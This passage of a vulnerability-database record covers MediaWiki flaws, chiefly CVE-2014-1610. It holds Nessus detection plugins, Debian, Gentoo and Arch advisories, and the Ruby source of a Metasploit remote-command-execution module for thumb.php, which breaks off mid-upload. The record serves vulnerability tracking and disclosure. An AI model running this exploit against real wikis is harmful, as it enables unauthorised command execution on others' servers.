or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.(\\d|1[0-9])([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.(\\d|1[01])([^0-9]|$)\" ||\n version =~ \"^1\\.23\\.[0-4]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.20 / 1.22.12 / 1.23.5' +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:12:29", "description": " - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "published": "2014-02-07T00:00:00", "title": "Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-07T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-1802.NASL", "href": "https://www.tenable.com/plugins/nessus/72379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-1802.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"FEDORA\", value:\"2014-1802\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1058981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/127942.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4c47368\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.21.5-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T00:55:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-4572"], "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 30, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describes the following\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled 
by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2014-03-30T09:33:19", "published": "2014-03-30T09:33:19", "id": "DEBIAN:DSA-2891-1:05758", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00064.html", "title": "[SECURITY] [DSA 2891-1] mediawiki security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:55", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-4572"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nIn the Mediawiki update issued as DSA 
2891-1, a few files were missing\nfrom the package. This update corrects that problem. For reference, the\noriginal advisory text follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describes the following\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been 
fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-03-31T17:07:49", "published": "2014-03-31T17:07:49", "id": "DEBIAN:DSA-2891-2:4C744", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00065.html", "title": "[SECURITY] [DSA 2891-2] mediawiki regression update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:35", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-4572"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-3 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610 CVE-2014-2665\nDebian Bug : 729629 706601 742857 742857\n\nThe Mediawiki update issued as DSA 2891-1 caused regressions. This\nupdate fixes those problems. 
For reference the original advisory\ntext follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describes the following\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.15+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u2\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.15+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions 
package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-04-04T18:03:20", "published": "2014-04-04T18:03:20", "id": "DEBIAN:DSA-2891-3:4C320", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00068.html", "title": "[SECURITY] [DSA 2891-3] mediawiki regression update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:29", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7295"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3046-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nOctober 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2014-7295\n\nIt was reported that MediaWiki, a website engine for collaborative work,\nallowed to load user-created CSS on pages where user-created JavaScript\nis not allowed. A wiki user could be tricked into performing actions by\nmanipulating the interface from CSS, or JavaScript code being executed\nfrom CSS, on security-wise sensitive pages like Special:Preferences and\nSpecial:UserLogin. 
This update removes the separation of CSS and\nJavaScript module allowance.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.19.20+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:1.19.20+dfsg-1.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-10-05T15:32:34", "published": "2014-10-05T15:32:34", "id": "DEBIAN:DSA-3046-1:77CE8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00233.html", "title": "[SECURITY] [DSA 3046-1] mediawiki security update", "type": "debian", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9476", "CVE-2014-9479", "CVE-2014-2244", "CVE-2014-9477", "CVE-2014-5243", "CVE-2014-5241", "CVE-2014-2242", "CVE-2014-9487", "CVE-2014-5242", "CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2014-9277", "CVE-2013-6472", "CVE-2014-9481", "CVE-2014-2243", "CVE-2014-9475", "CVE-2014-9507", "CVE-2013-6452", "CVE-2014-9478", "CVE-2014-2665", "CVE-2014-9276", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295", "CVE-2014-9480"], "edition": 1, "description": "### Background\n\nMediaWiki is a collaborative editing software used by large projects such as Wikipedia. \n\n### Description\n\nMultiple vulnerabilities have been discovered in MediaWiki. Please review the CVE identifiers and MediaWiki announcement referenced below for details. 
\n\n### Impact\n\nA remote attacker may be able to execute arbitrary code with the privileges of the process, create a Denial of Service condition, obtain sensitive information, bypass security restrictions, and inject arbitrary web script or HTML. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MediaWiki 1.23 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.23.8\"\n \n\nAll MediaWiki 1.22 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.22.15\"\n \n\nAll MediaWiki 1.19 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.19.23\"", "modified": "2015-02-07T00:00:00", "published": "2015-02-07T00:00:00", "id": "GLSA-201502-04", "href": "https://security.gentoo.org/glsa/201502-04", "type": "gentoo", "title": "MediaWiki: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7295"], "description": "It was discovered that MediaWiki, a wiki engine, was separating the\nallowance of css and js modules resulting in Cross-site Scripting (XSS)\nand UI redressing issues.", "modified": "2014-10-04T00:00:00", "published": "2014-10-04T00:00:00", "id": "ASA-201410-3", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000114.html", "type": "archlinux", "title": "mediawiki: Cross-site Scripting (XSS) and UI redressing", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-01-05T03:27:22", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2014-02-20T00:00:00", "type": "zdt", "title": 
"MediaWiki Thumb.php Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-20T00:00:00", "id": "1337DAY-ID-21922", "href": "https://0day.today/exploit/description/21922", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\r\\n\",\r\n 'PrependEncoder' => \"php -r \\\"\",\r\n 'AppendEncoder' => \"\\\"\"\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n 
[ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\r\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\r\n ], self.class)\r\n end\r\n \r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\r\n \r\n unless meta_generator\r\n vprint_status(\"No META Generator tag on #{full_uri}.\")\r\n return nil, nil, nil\r\n end\r\n \r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status(\"#{meta_generator} detected.\")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\r\n \r\n return major, minor, patch\r\n end\r\n \r\n return nil, nil, nil\r\n end\r\n \r\n def check\r\n uri = target_uri.path\r\n \r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n \r\n response = send_request_cgi!(opts)\r\n \r\n if opts['redirect_uri']\r\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\r\n end\r\n \r\n unless response\r\n vprint_status(\"No response from #{full_uri}.\")\r\n return CheckCode::Unknown\r\n end\r\n \r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status(\"#{response.code} response received...\")\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n 
\r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n \r\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\r\n CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n uri = target_uri.path\r\n \r\n print_status(\"Grabbing version and login CSRF token...\")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n \r\n unless response\r\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\r\n end\r\n \r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status(\"Windows platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status(\"Nix platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n \r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n \r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n \r\n 
session_cookie = response.get_cookies\r\n \r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n \r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\r\n else\r\n print_good(\"Retrieved login CSRF token.\")\r\n end\r\n \r\n print_status(\"Attempting to login...\")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n \r\n if login and login.code == 302\r\n print_good(\"Log in successful.\")\r\n else\r\n fail_with(Failure::NoAccess, \"Failed to log in.\")\r\n end\r\n \r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n \r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 
'session='\r\n auth_cookie << session_cookie\r\n end\r\n \r\n print_status(\"Getting upload CSRF token...\") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\r\n end\r\n \r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n \r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\r\n elsif upload_csrf\r\n print_good(\"Retrieved upload CSRF token.\")\r\n end\r\n \r\n upload_mime = Rex::MIME::Message.new\r\n \r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\r\n file_name = \"#{rand_text_alpha(4)}.djvu\"\r\n \r\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\r\n 